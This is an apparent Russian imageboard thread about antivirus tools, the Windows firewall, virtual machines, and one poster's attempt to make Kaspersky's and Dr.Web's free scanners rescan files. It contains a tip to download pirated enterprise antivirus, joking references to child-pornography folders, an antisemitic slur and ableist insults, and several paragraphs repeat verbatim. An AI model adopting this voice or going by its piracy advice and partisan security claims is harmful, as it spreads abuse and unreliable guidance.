Единственная по-настоящему действенная защита в спермомире - виртуальная машина.
Пилишь виртуалку, делаешь юзеру максимально кастированный акк, в котором не запускается ничего, акромя RDP-клиента, разрешаешь виртуалке автостарт. Юзер работает и в хуй не дует. Когда виртаулке настает пиздец - откатываешь ее со снапшота, а юзерскую инфу поднимаешь из бэкапа.
Если юзер - твой младший брат-дебил, который хочет играть в игоря и смотреть кинцо с ютуба, придется ставить ему отдельную ОС, запрещать монтировать разделы (чтобы не влез в твое ЦП) и иметь на готове откатный образ, который в случае наёба системы разворачивается обратно за 15 минут. Обязательно паролишь БИОС (чтобы нельзя было бутнуться с флешки и всё сломать) и свою ОСь.
Всё остальное - полумеры, которые никогда не смогут защитить от 0-day заразы вроде криптотроянов.
Пилишь виртуалку, делаешь юзеру максимально кастированный акк, в котором не запускается ничего, акромя RDP-клиента, разрешаешь виртуалке автостарт. Юзер работает и в хуй не дует. Когда виртаулке настает пиздец - откатываешь ее со снапшота, а юзерскую инфу поднимаешь из бэкапа.
Если юзер - твой младший брат-дебил, который хочет играть в игоря и смотреть кинцо с ютуба, придется ставить ему отдельную ОС, запрещать монтировать разделы (чтобы не влез в твое ЦП) и иметь на готове откатный образ, который в случае наёба системы разворачивается обратно за 15 минут. Обязательно паролишь БИОС (чтобы нельзя было бутнуться с флешки и всё сломать) и свою ОСь.
Всё остальное - полумеры, которые никогда не смогут защитить от 0-day заразы вроде криптотроянов.
100% защита и не требуется. Твой вариант годный, но не слишком удобен основному пользоввателю. Насчет безопасности виртуалок, кстати, многие поспорят.
>но не слишком удобен основному пользоввателю.
Чем?
>Насчет безопасности виртуалок, кстати, многие поспорят.
Ну поспорь.
Ну типа доступ к реальной оперативке, бэкдоры и незалатанные баги.
А неудобен, наверное, тем, что не всегда есть возможность разделить окружения. Это может быть как банально неэффективным использованием места на диске, так и случаем "есть папка с лолями и гитлером, надо просканить".
Кстати забавно, что касперский и дохтур распаковываются куда-то, но мне не удалось найти их следы в appdata, program data, all users и подобных ожиданых местах.
сканируешь сканером при отрубленном интернете, после чего подрубаешь интернет и гуглишь наименования пропаленной живности, исходя из этого составляешь план борьбы.
>доступ к реальной оперативке
Нет.
>бэкдоры и незалатанные баги
Не юзай виртуалбокс.
>неэффективным использованием места на диске
За всё хорошее нужно платить.
>"есть папка с лолями и гитлером, надо просканить"
Виросы никогда не запускаются из левых папок. Никогда.
> Виросы никогда не запускаются из левых папок. Никогда.
Он о том, что кусок зонда сразу отправит товарищу майору данные о том, что на данной пеке лоли и Гитлер.
Но я хочу использовать содержимое папок после очистки. Лол.
Кто тебе сказал, что в боксе есть бэкдоры и незалатанные баги, а в vmware их нет или меньше?
Тем временем, недоудаленный касперский сливает статку - имена файлов и их хеши гэбне.
Вау. ВАУ! Касперский не только устанавливается хуй знает куда (примерно как описано тут http://softobase.com/ru/vopros/skazhite-kuda-ustanavlivaetsya-kaspersky-virus-removal-tool-tool-kasperskogo), но еще и в защищенные от чтения администратором папки с хер знает какими названиями (даже не цифровыми). Само по себе это похуй, но kvrt только что отказался повторно просканировать проверенную папку, точнее, выполнил успешное и ничего не нашедшее сканирование за 14 секунд.
А нахуй сканить папку с ЦП, если виросы все в системных папках?
На самом деле хранить что-либо палевное на 8 винде - слабоумие и слабоумие, ибо TPM бдит.
>Но я хочу использовать содержимое папок после очистки
Используй. Только экзешники поудоляй.
>Кто тебе сказал, что в боксе есть бэкдоры и незалатанные баги
Сам видел.
>а в vmware их нет или меньше
Энтерпрайз. И вообще, есть HyperV, пиленый самим спермогосподином.
Сам видел - збс аргумент. Ну типа троян-довнлоадеры внутри мультимедиа файлов, вся хуйня, внутри архивов
Я не думаю что есть какой-то универсальный вариант для всех, все упирается в технический уровень пользователя и усугубляется сменой ориентиров вредоносного ПО. Вот пара тезисов.
Если человеку нужно прямо сейчас без регистрации и смс скачать рингтоны, он без труда найдёт свежую говёшку, которая не успела попасть в актуальные сигнатуры.
Время винлокеров и деструктивных забавы ради (iloveyou, wincih-чернобыль, хочупеченьку, черви) вирусов остались в прошлом, актуальные биткоин майнеры, облака-ботнеты являются вредоносными субъективно с точки зрения рецепиента, и подобно ирл-паразитарным-инфекциям могут протекать бессимптомно.
Крупные корпорации не гнушаются встраивать зонды и ботнеты в драйверы, военные и прочие властные структуры тратят уйму бабосов на имплементацию бэкдоров на самом низком уровне (прошивки чипсетов, бог знает что ещё).
Корпоративные крючкотворы штампуют "отказы от ответственности" вместо TOSов, с попустительства государства и через лоббирование оставаясь в правовом поле.
Скудная документация проприетарного софта вкупе с объемом кода, который выдают как индусы-на-крэке, так и авангард специалистов по информационной безопасности вытесняет из этой сферы васянов.
Таким образом я вижу два фундаментальных подхода. Для пенсионеров и нейроинвалидов подойдет операционка из коробки, которая заботливо потрет винлокер и утилизирует свободные мощности православным .net ngen\обучалкой кортаны\таргетированием рекламы. Для энтузистов и задротов радикальные твики\хаки, свободное ПО, ручной менеджмент процессов и окукливание браузера, необходимость в антивирусе может возникнуть разве что ситуационная если раз в пол-года нужно скачать что-то с дорвейной помойки. Дальше всех в этом смысле продвинулся, пожалуй, Столлман, который отказался от мобильного телефона (и компьютера? на чем он компьютит, на комодоре 64? я не в теме).
Суммируя, в 2016 ты либо подставляешь жопец цифровому жиду и на свои деньги покупаешь вычислительные мощности для бандитов, либо погружаешься в асоциальные задротские низкоуровневые пучины и вместо игр и работы занимаешься пресловутым пердолингом. Печальнее всего выглядит объективная неспособность свободного специалиста в области информатики повлиять на ситуацию, рынок потребительской электроники хочет сдесь, сейчас, с графоном, и не привык париться над приватностью и безопасностью. Такое мое мнение.
Если человеку нужно прямо сейчас без регистрации и смс скачать рингтоны, он без труда найдёт свежую говёшку, которая не успела попасть в актуальные сигнатуры.
Время винлокеров и деструктивных забавы ради (iloveyou, wincih-чернобыль, хочупеченьку, черви) вирусов остались в прошлом, актуальные биткоин майнеры, облака-ботнеты являются вредоносными субъективно с точки зрения рецепиента, и подобно ирл-паразитарным-инфекциям могут протекать бессимптомно.
Крупные корпорации не гнушаются встраивать зонды и ботнеты в драйверы, военные и прочие властные структуры тратят уйму бабосов на имплементацию бэкдоров на самом низком уровне (прошивки чипсетов, бог знает что ещё).
Корпоративные крючкотворы штампуют "отказы от ответственности" вместо TOSов, с попустительства государства и через лоббирование оставаясь в правовом поле.
Скудная документация проприетарного софта вкупе с объемом кода, который выдают как индусы-на-крэке, так и авангард специалистов по информационной безопасности вытесняет из этой сферы васянов.
Таким образом я вижу два фундаментальных подхода. Для пенсионеров и нейроинвалидов подойдет операционка из коробки, которая заботливо потрет винлокер и утилизирует свободные мощности православным .net ngen\обучалкой кортаны\таргетированием рекламы. Для энтузистов и задротов радикальные твики\хаки, свободное ПО, ручной менеджмент процессов и окукливание браузера, необходимость в антивирусе может возникнуть разве что ситуационная если раз в пол-года нужно скачать что-то с дорвейной помойки. Дальше всех в этом смысле продвинулся, пожалуй, Столлман, который отказался от мобильного телефона (и компьютера? на чем он компьютит, на комодоре 64? я не в теме).
Суммируя, в 2016 ты либо подставляешь жопец цифровому жиду и на свои деньги покупаешь вычислительные мощности для бандитов, либо погружаешься в асоциальные задротские низкоуровневые пучины и вместо игр и работы занимаешься пресловутым пердолингом. Печальнее всего выглядит объективная неспособность свободного специалиста в области информатики повлиять на ситуацию, рынок потребительской электроники хочет сдесь, сейчас, с графоном, и не привык париться над приватностью и безопасностью. Такое мое мнение.
>на чем он компьютит, на комодоре 64? я не в теме
На ноутбуке со свободным биосом. Там железо уровня 2010 года, т.е. жить можно.
Товарищи, я возмущен и напуган! И касперский, и кур-ит, будучи распакованными ХУЙ ЕГО ЗНАЕТ КУДА, отказываются повторно проверять заданную директорию, даже если там лежат дампы баз и архивы на десятки гигабайт. Где хранятся логи, хеши, все остальное??? Никогда я еще так глубоко не чувствовал зонд господина
Хотел в этом контексте резюмировать на тему необходимости антивируса: передовица троянов от васяна найдет себе дорогу через варез и пиратские альбомы "бутырки". Я даже не знаю что хуже, один раз зафакапить систему и данные каким-нибудь говном или 24\7 выделять мощности на "облачную проверку" и постоянную дрочку жесткого диска. В первом случае еще есть шанс набраться ума и какой-никакой технической культуры, во втором это слепое доверие очередной корпорации. Я не вижу смысла в антивирусе.
Как замечательно, что информации в интернете НОЛЬ, удаление руками найденной хуйни с последующей перезагрузкой проблему не решает.
Чот проигрываю с СПЕРМОПРОБЛЕМ.
Поищи тут:
%appdata%
%programdata% (вроде так)
c:\windows\temp
c:\windows\system32\temp
может еще в локале вместо роуминга что-то лежит.
Пользуюсь Касперским лет 7, доволен как слон. А все потому, что не верю в бесплатные антивирусы.
Бля, давай вот не надо про спермопроблемы. Во всех осях достаточно косяков, просто они разные. Искал везде, где ты описал, кроме последней папки, ее у меня нет.
КРАСИВО
Почистил все ccleaner'ом. Удалил невычищенное руками из временным папок. И нихуя. Все равно отказываются сканировать повторно, оба.
Попытки гуглить находят наш тред. Я в ахуе, дорогая редакция.
Игрун, ты предлагаешь искать "это всё" в пользовательском дереве active directory, в этом смысла как накатить виртуалку и искать в ней.
Бггггггггггг. Ищи пути в реестре.
Ебанутый? Какое AD?
Установил сперму лет 5 назад. Ни разу не ставил АВ. Брат жив.
Раньше всегда стоял каспер, заебал. На левые сайты БЕЗ СМС и прочую хуйню не лезу.
Надо ради интереса поставить что-нибудь, проверить.
Раньше всегда стоял каспер, заебал. На левые сайты БЕЗ СМС и прочую хуйню не лезу.
Надо ради интереса поставить что-нибудь, проверить.
Если коротко, пользовательский домен это продукт системного домена. Нужно логиниться в системный или долго и упорно качать права и смотреть листинг C:\config.msi, system volume information, users\myuser. Ты если почитаешь документацию вместо бравирования устаревшими знаниями, тоже ебанешься. Так что сиди уж лучше на федоре.
Что и где конкретно ты предлагаешь искать?
Алсо, попробуй дать касперу\кьюриту права system, trusted installer, IIS_IUSRS, даже если ты вырубишь дефендер и брандмауер его все равно будет ограничивать lsass.
Ты о чем, лол? Это мне ответ был?
Отлично, но при чем тут %appdata%?
Везде. Пути к папкам, которые не сканятся.
На спермерке еще можно сломать patchguard и дать права system с полным доступом в ring0, бгггг.
Если и ставь - то только на виртуалку. Систему запомоишь же.
Он правда хранит что-то защищенное от чтения в appdata/temp
Неа. Нихуя интересного не нашел. И по запросам вроде cureit, kvrt тоже. Параллельно искал документацию на эти софтины. В первом случае никакой инфы, во втором вообще ничего толковее 3.5 нубовопросов не отыскал.
> негибкое формулирование правил, невозможность совместить правило "конкретная программа И конкретный набор портов", а только "порт открыт ВСЕМ" или "программе открыты ВСЕ порты"
Ты сейчас о чем говорил?
1. Серьёзные антивирусные решения: intel-mcafee, symantec, trendmicro, kaspersky. У mcafee и symantec энтерпрайз-версии без проблем ставятся на одиночные системы и не требует ключей и регистрации. Ищи на рутрекере и руборде mcafee virusscan и symantec endpoint protection. В первом больше возможностей по контролю, во втором ещё брендмауэр. Про остальных не знаю.
2. Единственный способ защитить систему от вирусов, шифраторов, подобного дерьма и самих пользователей — это ограничение прав и applocker/software restriction policies.
3. Всё, что ты написал про виндовый брендмауэр полная хуйня. Ты даже не пытался с ним разобраться.
>intel-mcafee
ЛОЛБЛЯДЬ
>symantec
Решето и лагогенератор.
>kaspersky
Просто хуйня.
>даун высказал своё мнение
Лол, я немного не так может выразился. Ты можешь сделать "создать правило для входящих, для программы, выбрать все настройки-настроечки, открыть свойства, заменить все порты на конкретные (входящие и исходящие), сохранить. Повторить все то же самое для исходящих". Заебись. Скорость, эффективность, удобство. Я лет, кажется, десять назад делал все то же самое в автоматически выскакивающем окошке нода32, нажатием 1-2 кнопок.
Иди еще инторнетиков почитай, спермочучело.
Я юзал все три. В итоге эффективнее и дешевле оказалось впилить сквид с кламавом, запретить в офисе флешки и скачиваение любых исполняемых файлов.
На скринах именно то, о чем ты и говоришь. А для всплывающих окошек тебе правильно посоветовали
Вот, анон
http://www.youtube.com/watch?v=fsvhIxlTkug
Посмотри пожалуйста это видео, потом уже смотри купленные обзоры. Я вот сейчас не могу удалить ни кврт, ни кур-ит.
Мокрописька с кейгеном и закрытым кодом? Спасибо.
Да, конечно, информации ноль. А где ты пробовал спрашивать, кроме как на харкаче?
Ну сходи на Ответы@майл.ру, если форум разработчика тебе не под силу.
Логи ты никогда не найдешь. http://forum.drweb.com/index.php?showannouncement=1&f=2
>Мокрописька с кейгеном и закрытым кодом
У тебя вся ОСь - мокрописька с кейгеном и закрытым кодом. Хуже уже не будет.
> Apple GayPad: Safari
И этот человек говорит нам о вреде закрытого кода и анальных зондах.
[ирония] Серьезно? Спасибо, очень полезный и содержательный комментарий [/ирония]
То, что ты скинул, относится к полной версии антивируса, а не к кур-иту, а папку с его логами и прочим я удалил самым первым делом, это ничего не дало, в ней не лежит ни хешей, ни передаваемой информации, нихера.
Это как разрешить простуженному не пользоваться презервативом - хуже-то уже не будет...
Нахуй брызгать желчью в тематике?
У меня на этом устройстве самая личная информация - пароль от личной почты и скайпа.
Не знаю про курит и кврт (что это?), но симантек и мкафии удаляются кнопкой удалить. Либо специальной утилитой.
>Я юзал все три. В итоге эффективнее и дешевле оказалось впилить сквид с кламавом, запретить в офисе флешки и скачиваение любых исполняемых файлов.
Что можно взять с любителя костылей и велосипедов. Разграничение прав и контроль? Не, я запрещу флешку. Даун же.
>курит и кврт (что это?)
Kaspersky virus removal tool и dr web cureit - бесплатные сканеры и моя главная проблема в данный момент. Точнее, не столько проблема, сколько повод для сильной анальной боли.
>удаляются кнопкой удалить
Ты посмотри видео выше-то, как раз про удаление.
>Это как разрешить простуженному не пользоваться презервативом - хуже-то уже не будет...
Это как разрешить спидозному ходить без шапки. Хуже всё равно не будет.
Почитал бы что мокрописька делает.
Я тебе намекнул, что можно пойти на форум и спросить.
Но нет, ты будешь и дальше гоняться за сусликами и бояться текстовых файлов - логов.
Удалил первым делом.
Что смотреть на видео? Где мкафии забавляется над даунами? Я его видел. Я десятки раз удалял, что симантек, что мкафии с разных систем, включая домашние.
Открой официальные форумы и поищи там реально актуальные проблемы. Удаления в них нет.
>купленные обзоры
Запомни на всю жизнь, что ничего не заставить тебя выглядеть более тупым, чем то, что ты сам скажешь.
Я давно про нее знаю.
Твой пример мало того, что неуместен, так еще и неправилен. Вич-положительный пациент имеет все шансы на довольно сносную и продолжительную жизнь, если как раз будет думать о прочих проблемах своего здоровья.
Первым делом посмотрел. Путь к файлу - ок, охуенно полезная инфа, прям хэшихуеши. Я не хочу пока что спрашивать на их форуме (и ждать ответа бог знает сколько), иначе по их результатам опять удалю не все.
Тебе бы самому этому правилу следовать. Хотя похуй, ничего интересного ты мне все равно говорить не хочешь, поэтому давай не будем флейм разводить.
Есть мысля закинуть антивирус и набор файлов в виртуалку, а также какую-нибудь прогу, которая покажет, какие изменения были произведены в файловой системе и реестре. Ну и по аналогии вычистить говно у себя. Посоветуете такую?
Что я могу сказать человеку, который не может удалить программы, которые даже установки не требуют, зачем-то ссылается на комедийное видео от сумасшедшего в качестве аргумента и называется квадрат Gartner купленным обзором? Ничего.
> 2016 эпоха контейнеров
> ставить антивирус
http://www.urbandictionary.com/define.php?term=McAfee
Ничего не говори. Подумай о чем-нибудь хорошем или сходи к психологу. И умерь ЧСВ, а то фонтанирует прямо.
>urbandictionary.com
Очередной аргумент.
Ваши аргументы не аргументы! Вы фсё вретиииии!!! Ррррряяяя...
> Путь к файлу - ок, охуенно полезная инфа, прям хэшихуеши.
Ты сам писал, что не можешь найти логи
> Где хранятся логи, хеши, все остальное??
Хеши. Хеши чего, блядь? Найденных вирусов? Отправляются в ходе проверки. Твоих архивов цопе? Тебе не приходило в голову, что оно им нахуй не нужно?
http://download.geo.drweb.com/pub/drweb/cureit/doc/drweb-cureit-paid-ru.pdf
> Отправка статистики
> Для проведения анализа вирусной обстановки в мире и дальнейшего совершенствования механизмов проверки и обезвреживания угроз. Dr.Web
CureIt! предоставляет возможности по отправке обезличенной статистики об антивирусной проверке на сервера компании «Доктор
Веб». Данные передаются в ходе проверки и содержат только следующие общие сведения:
> - характеристики процессора (имя, техническое описание, текущая и максимальная скорость, количество ядер и количество логических процессоров);
> - характеристики оперативной памяти (общее и свободное на момент проверки количество физической и виртуальной памяти);
> - параметры операционной системы (имя, версия и номер сборки, установленные пакеты дополнений (service pack), режим загрузки, привилегии учетной записи - пользовательские или административные, региональные настройки);
> - сведения об установленном антивирусе, антишпионе и брандмауэре;
> - информация об отдельных найденных угрозах (тип и название угрозы, тип и название зараженного объекта, примененное к объекту действие, при необходимости – хеш-сумма зараженного файла);
> - сводная информация о проверке (время окончания проверки, количество проверенных файлов и объектов, количество подозрительных объектов, количество обнаруженных угроз каждого типа);
> - сводная информация о примененных действиях (количество объектов, к которым действия не применялись, а также количество вылеченных, удаленных, перемещенных, переименованных и проигнорированных объектов).
> Вы можете ознакомиться с политикой конфиденциальности компании «Доктор Веб» на официальном сайте по адресу http://company.drweb.com/policy/
Магия.
К тому моменту уже нашел, естественно.
Хеши - файлов. Ты ветку почитай, как еще эти утилиты узнают, что файлы уже проверялись и не проверяют их повторно? Логи удалены, временные файлы все найденные удалены, компьютер перезагружен, интернет выключен с самого начала. Не только архивы. Мультимедиа, текстовые дампы баз, исполняемые файлы - все.
Я понял о чем ты, но к этим записям ты доступ не получишь. Они будут зашифрованы и защищены, иначе какой-нибудь хитрый вирус пометит себя как уже проверенный и чистый.
Мне не надо их просматривать и изменять, мне надо их УБРАТЬ, ВЫПИЛИТЬ НАХУЙ ИЗ СИСТЕМЫ, заставив ебаные антивирусники пройтись по проверенным файлам еще раз, даже если они уверены, что там теперь все чисто. Потому что это скорее всего не так (некоторые файлы, которые они якобы удалили (а они их именно удалили, а не вылечили) остались в системе без каких-либо изменений, в том числе по хешу).
SysTracer'ом думаю пройтись, но для этого надо новую восьмерку на виртуалку ставить, делать ее копию на случай, если трэйсер не найдет...геморно, пиздец.
Да, речь именно о хешах, похоже, потому что смена пути до того же файла эффекта не дает, пидорский антивирусник считает эти файлы проверенными все равно. Можно Process Monitor'ом или еще какой-нибудь хитрой писькой Руссиновича посмотреть, куда лезет антивирусник в процессе проверки читать свои ебаные хеши?
Они по новой и проверяют при каждом запуске сканирования. Если ты о CureIt.
Единственное, Касперский когда-то запилил в 8-й версии технологию iSwift и iChecker, позволяющую снизить нагрузку на систему за счет того, что он помечал чистые файлы и второй раз не проверял их. Но сразу вслед за этим разгорелся скандал, из-за того что он не проверял и свежие вирусы, которые добавили в базы, а они уже были помечены как безопасные новой фичей. Потом, я думаю, пофиксили этот баг, но в любом случае это применяется в антивирусе, а не в AVP Tool.
https://support.kaspersky.ru/7407
> а они их именно удалили, а не вылечили
Как будто есть разница. Если тебя там доедают вирусы, так и скажи.
Не знаю о таком. Ты какой-то ерундой занят. Расскажи лучше подробнее про свои вирусы и как ты их ловишь. Где сидят и как называются.
Да нет же, кур-ит тоже обосрался с этим.
Он НЕ проверяет файлы повторно, проверка папки с файлами различных типов на десятки гигабайт занимает 10 секунд повторно, а при первом сканировании он часами ебашил.
Да все обычнее некуда, оно все описано на сайте касперского того же. От троянов в кейгенах до спрятанных в мультимедиа файлах. Ну, если непредсказуемое функционирование и недокументированное засерание системы - фигня...
Не понимаю твоей проблемы, ну не нравится тебе скан курита - скачай демку обычного антивируса и сделай скан он деманд.
А ещё не понял страхов перед проверкой цп. Бесплатные ав да, отправляют всякую статистику, но вряд ли на таком уровне, платные такой хуитой не страдают (кроме касперыча).
>2016
>антивирус
Бляяяяя.
>антивирус
Бляяяяя.
Неприятно же
Цп - я условно сказал
Просто иди нахуй
>исключения в него пишет кто и когда хочет
Только если ты запускаешь программу под админом.
> отдельные правила на вход и выход
Это фича.
>а только "порт открыт ВСЕМ"
Можно указать чтобы по дефолту входящие и исходящие блокировались для всех программ.
>2016
>Обсуждать вирусы.
>А все потому, что не верю в бесплатные антивирусы.
WFC это лишь фронтенд (более удобный интерефейс, окошки) к встроенному фаерволу виндовс.
А ты запускаешь инсталяторы и прочее под пользователем? Обычно, они в таких случаях отказываются работать.
Понятно, что "можно". Но удобно ли?
NTFS Streams. Файлы и папки в файловой системе НТФС могут содержать так называемые "потоки" куда любые программы могут сохранять свои метки, любую дополнительную информацию.
>
>Понятно, что "можно". Но удобно ли?
Ну если ты дебил то можешь сделать из своего компьютера проходной двор. И указать чтобы по дефолту всем программам был полный доступ в интернет. А потом удивляйся вирусам и потере своих частных документов, паролей, фоток, потере трафика и тп.
Я предпочитаю точно указывать каким программам можно пользоваться сетью а кому нельзя. Мне кажется такой подход намного более безопасным.
>
>А ты запускаешь инсталяторы и прочее под пользователем? Обычно, они в таких случаях отказываются работать.
Ставишь прогу в песочнице Sandboxie или в виртуалке. Затем копируешь в реальную виндовс и запускаешь без админских прав.
Я с этим не спорю, лол. Только опять-таки, в нормальных файрволах правило "запрещено всем, кому не разрешено" ставится одной галкой или уже включено по умолчанию. А тут сколько надо?
Гадость какая. Где искать потоки этих говн?
>
>Гадость какая. Где искать потоки этих говн?
https://technet.microsoft.com/en-us/sysinternals/streams
>А тут сколько надо?
В WFC одним кликом http://www.binisoft.org/wfc.php .
Или так https://technet.microsoft.com/ru-ru/library/cc947801%28v=ws.10%29.aspx . Нужно настроить свойства.
> проверка папки с файлами различных типов на десятки гигабайт
Впервые слышу, чтобы при повторной проверке не сканировало. В любом случае, от проверки теми же базами толку нет, качай новый, они обновляются на фтп чуть ли не каждый час.
Но почему ты ищешь вирусы там? В папке на диске на несколько Гб?
> От троянов в кейгенах до спрятанных в мультимедиа файлах
На мой взгляд ты занят охотой на ведьм и войной с ветряными мельницами.
Если бы у тебя действительно был стрррашный вирус, и CureIt не смог его удалить, хотя знал сигнатурно, тогда можно было бы взять лог проверки и обратиться в техподдержку или на форум. Но логи ты уже удалил, ни к кому обращаться и не собирался, и у меня есть предположение, что и вирусов у тебя не было. Ты просто хочешь танцевать в бубном и бояться каждого файла.
Я такого не понимаю.
На какую директорию ты предлагаешь ее натравливать?
Ну попробуй сам, не вру же я.
>Но почему ты ищешь вирусы там? В папке на диске на несколько Гб?
Специально запилил директорию, куда сбросил несколько однозначно инфицированных разными типами вирусов файлов, также разных типов.
>На мой взгляд ты занят охотой на ведьм и войной с ветряными мельницами.
Я думал, половина /s этим занимается, лол. Ну, развлечение типа. Неужели не интересно, где хранит данные о тебе такая вот бесплатная утилита, куда она умудрилась забраться так глубоко, что не вычистишь? Да и неприятненько, повторюсь.
> В любом случае, от проверки теми же базами толку нет, качай новый, они обновляются на фтп чуть ли не каждый час.
Иииии, ХУУУУУУЙЦА!!!!111
Новая версия точно так же просканировала 50 гигабайт за 10 секунд.
Мне не интересно. Во-первых, доктору разрешен хранить что угодно, одно время я даже пользовался им. Во-вторых, данные обо мне он не хранит, конфигурацией моего некрожелеза так уж и быть, поделюсь. Но вообще-то я никогда не давал ему выход в интернет. И дело даже не в том, что мне жалко, мне просто лень для такой ерунды специально создавать правило в фаерволе.
После закрытия CureIt у меня не оставляет запущенных исполняемых файлов и ничего не закрывает.
> Специально запилил директорию
Так бы сразу и сказал. Ковыряйся на здоровье. Я думал, ты подозреваешь у себя реальные вирусы и не можешь их одолеть.
Но все равно добавлю на последок, что ты не вирусный аналитик, и можешь принять за "однозначно инфицированную" вполне безобидный файл. Кейгены не являются вирусами, по загадочные вирусы спрятанные в мультимедиа я даже слышать не хочу, так как это мельницы.
Такого не бывает, ищи проблему у себя. Или иди в техподдержку. Я с таким никогда не сталкивался.
> и ничего не закрывает
В смысле, не отсылает.
Фикс
Нет, это вирусы, сдетекченные большинством антивирусов вирустотала, причем однозначно. Не хочешь слышать - не слушай, а вот оффсайт касперыча с тобой не согласен.
Не бывает? Окей, для kvrt тоже "не бывает" или только для cure it?
>На какую директорию ты предлагаешь ее натравливать?
Ты идиот ?
Большинство антивирусов воюют с ветряными мельницами. Они будут детектить и чистые кейгены, просто потому что это hack tool. И ругаются чаще всего на упаковщик. Это не делает файлы вредоносными. Доктор Вэб не ловит программы взлома принципиально, и детектит не по упаковщику, а распаковывает и проверяет компоненты. Так что в этом случае если вирустотал видит вирус, а Доктор нет, прав будет Доктор.
> оффсайт касперыча с тобой не согласен
Оф.сайт не рапростаняет вирусы, ты не можешь скачать оттуда заведомо вредоносный файл для своих тестов. А медиафайлы, которых ты боишься, это мельницы.
> для kvrt тоже "не бывает" или только для cure it?
Ничего не могу сказать, давно не пользовался и даже не интересовался.
Но очевидно, что 50 Гиг нельзя проверить за 10 секунд, если только это не один том, упакованный чем-то хитрым. И очевидно, что у других людей этих проблем нет.
huck, очевидно.
Фикс
> huck
Нет, блядь, таки hack. Я точно идиот и мне пора спать.
Короче это пустой разговор. Окончательно решение антивирусного вопроса в том, что вредоносный файл или нет определяет вирусный аналитик, а не вирустотал. Политика российских антивирусов более лояльна к крякам и патчам. А детект их большинством буржуйских антивирусов - это ложное срабатывание, которое так же является осознанной политикой вирусной лаборатории. Из Авиры так и отвечали, что да, файл безопасен, но детект убирать не будем.
>по загадочные вирусы спрятанные в мультимедиа я даже слышать не хочу, так как это мельницы.
>Оф.сайт не рапростаняет вирусы
>А медиафайлы, которых ты боишься, это мельницы.
Ты или толстишь, или тупишь.
http://www.securitylab.ru/virus/399969.php
http://www.kaspersky.ru/news?id=207732771
> И очевидно, что у других людей этих проблем нет.
Тебе очевидно? Или другие люди - это ты лично? Ты на виртуалке протестил может и убедился в своей правоте? Или тебе просто уодбно кукарекать с дивана с видом профессиАНАЛА?
Ты вообще видишь разницу между хактулом и трояном, встроенным в такую программу? О том, что Васяны под видом кряков и кейгенов регулярно впаривают вирусы, ты тоже ничего не слышал?
Нет, а ты? Если ты предлагал папку, в которой лежат проверяемые файлы, то no streams found. Если те, в которых лежат куски антивирусника - мы их так и не нашли.
Вот она: красткая суть треда в софтаче. ОП поднимает проблему, со всех сторон раздаются вопли "НИНУЖНА", обвинения в интеллектуальной неполноценности, появляются какие-то псевдосципиалисты со своими охуительными историями. На деле же софтачеры оказываются удивительно некомпетентны в любом вопросе, касающемся любой составляющей любой операционной системы.
> Ты вообще видишь разницу между хактулом и трояном, встроенным в такую программу?
Я вижу, а 99% движков на вирустотале нет. Собери кучу безвредный кейгенов и проверь, половина из них будет содержать trojan.
> О том, что Васяны под видом кряков и кейгенов регулярно впаривают вирусы, ты тоже ничего не слышал?
Слышал, но сам ни разу не находил в кейгенах действительно вредоносный файл. Зато ложные срабатывания на них видел в 100% случаях у зарубежных антивирусов. Я не говорю, что там не может быть вируса, но я отсюда не могу знать, есть ли вирус в тех конкретных кейгенах, которые ты тестируешь. все что я хотел сказать, что ты, тупой ты еблан, не можешь ориентироваться исключительно на детект зарубежных движков на вирустотале, выше я объяснил почему. Если каспер и доктор тоже определяют как вирус, тогда вопросов нет.
> Тебе очевидно? Или другие люди - это ты лично?
Очевидно, потому что я сам с этим ни разу не сталкивался за несколько лет, не слышал от других, не читал жалоб на форуме. А лично ты "другие люди", чтобы утверждать, что проблема у всех? Ты можешь воспроизвести ее на других машинах?
> Ты или толстишь, или тупишь.
Лично я действительно не хочу ничего слышать о медиафайлах и тестировать их. У себя на машине я такого не допущу. Обрати внимание, что при грамотно настроенном фаерволе цель злоумышленника не достигается.
При этом я не отрицаю возможность таких уязвимосей, эксплойтов по них, вредоносного ПО. Просто я повторяю еше раз, ты не вирусный аналитик, поэтому я не делаю никаких выводов о вредоносности тестируемых тобой семплов. Может да, может нет. Если тебе и правда удалось нарыть где-то реальные вирусы, претензий нет. Мне просто без разницы.
Но в таком случае ты должен не кукарекать о том, что "не ловит", а отправить в вирлаб как неопределяемый вирус, или определяемый, но не удаляемый. По-моему это очевидно. Что сделал лично ты?
> половина из них будет содержать trojan
Имеется в виду слово trojan в названии.
А я и не говорил ничего, тупой ты еблан, о кейгенах, не содержащих ничего плохого.
> не можешь ориентироваться исключительно на детект зарубежных движков на вирустотале
Я и не ориентируюсь. Да, касперский их тоже детектит.
>Лично я действительно не хочу ничего слышать
>Мне просто без разницы.
Ну и иди нахуй тогда. Что ты делаешь ИТТ, кроме попыток строить из себя умного и флейма? Для альтернативно одаренных еще раз: касперский (ололо, вирусной аналитег) задетектил вирус, другие тоже задетектили вирусы, да, в медиафайле, вирусы в которых ты еще недавно ОТРИЦАЛ (ВРЬООООТИ!), а теперь слышать не хочешь (Меня это не кококосается), да, касперский тоже (я говорил это уже?), да, доктор веб тоже. Касперский, кстати, тоже его задетектил.
Я сейчас вообще не говорю ни о приципах работы конкретного антивируса в вопросе обнаружения угроз, ни о сравнении эффективности, ни о чем таком. Я говорю только о том, что kvrt и cureit неизвестно где в системе хранят незивестно что неопределенно продолжительное время, при этом отказываясь выполнять прямо возложенную на них задачу. Тебе есть, что возразить по этому поводу или у тебя опять врьоти? Кстати, тебе когда-нибудь кто-нибудь говорил о том, что не нужно быть нефтяником, чтобы понять, что тебе заливают мочу в бак?
> Что ты делаешь ИТТ
ОП-пост был об антивирусах и фаерволах. А потом ты решил, что это твой блог и переключился на хэши.
> вирусы в которых ты еще недавно ОТРИЦАЛ
Меня неправильно поняли. Я не столько отрицал, сколько сомневался в компетентности домохозяйки, которая в ОП-посте сразу же пишет, что виндовый фаервол не настраивается и работает по принципу "все или ничего".
> отказываясь выполнять прямо возложенную на них задачу
Ну у тебя отказываются, у меня нет. При этом я предложил сразу обратиться к разработчикам, но ты предпочитаешь имитацию бурной деятельности.
Пожалуй я и правда пойду отсюда, пусть линуксоиды тебя обоссут тред скатится в холивар, как и все предыдущие треды об антивирусах.
Как вам не западло пользоваться закрытокодной мокрописькой от неизвестно кого, да еще и к стандартному виндовому брандмауэру?
